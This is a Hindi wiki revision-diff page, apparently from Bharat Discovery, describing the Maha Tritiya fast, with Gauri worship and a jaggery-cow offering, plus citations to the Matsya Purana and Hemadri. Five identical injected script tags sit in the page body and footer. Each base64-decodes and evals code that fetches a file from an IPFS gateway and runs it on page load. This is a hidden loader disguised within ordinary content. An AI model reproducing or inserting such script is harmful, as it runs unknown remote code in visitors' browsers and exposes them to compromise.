Difference between revisions of "महा तृतीया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (महातृतीया का नाम बदलकर महा तृतीया कर दिया गया है)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*महातृतीया माघ या चैत्र की तृतीया को होता है।
+
*महातृतीया [[माघ]] या [[चैत्र]] की [[तृतीया]] को होता है।
*इसमें गौरी की पूजा की जाती है।   
+
*इसमें [[गौरी]] की पूजा की जाती है।   
 
*इस व्रत में गुड़धेनु का अर्पण किया जाता है।<ref>[[मत्स्य पुराण]] (82)</ref>
 
*इस व्रत में गुड़धेनु का अर्पण किया जाता है।<ref>[[मत्स्य पुराण]] (82)</ref>
 
*किन्तु स्वयं को गुड़ नहीं खाना होता है।  
 
*किन्तु स्वयं को गुड़ नहीं खाना होता है।  
*इससे प्रसन्नता एवं गौरी लोक की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 1, 484, पद्मपुराण से उद्धरण)</ref>
+
*इससे प्रसन्नता एवं [[गौरी लोक]] की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, 484, [[पद्म पुराण]] से उद्धरण)</ref>
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 05:56, 10 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • mahatritiya magh ya chaitr ki tritiya ko hota hai.
  • isamean gauri ki pooja ki jati hai.
  • is vrat mean gu dadhenu ka arpan kiya jata hai.[1]
  • kintu svayan ko gu d nahian khana hota hai.
  • isase prasannata evan gauri lok ki prapti hoti hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. matsy puran (82)
  2. hemadri (vratakhand 1, 484, padm puran se uddharan)

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>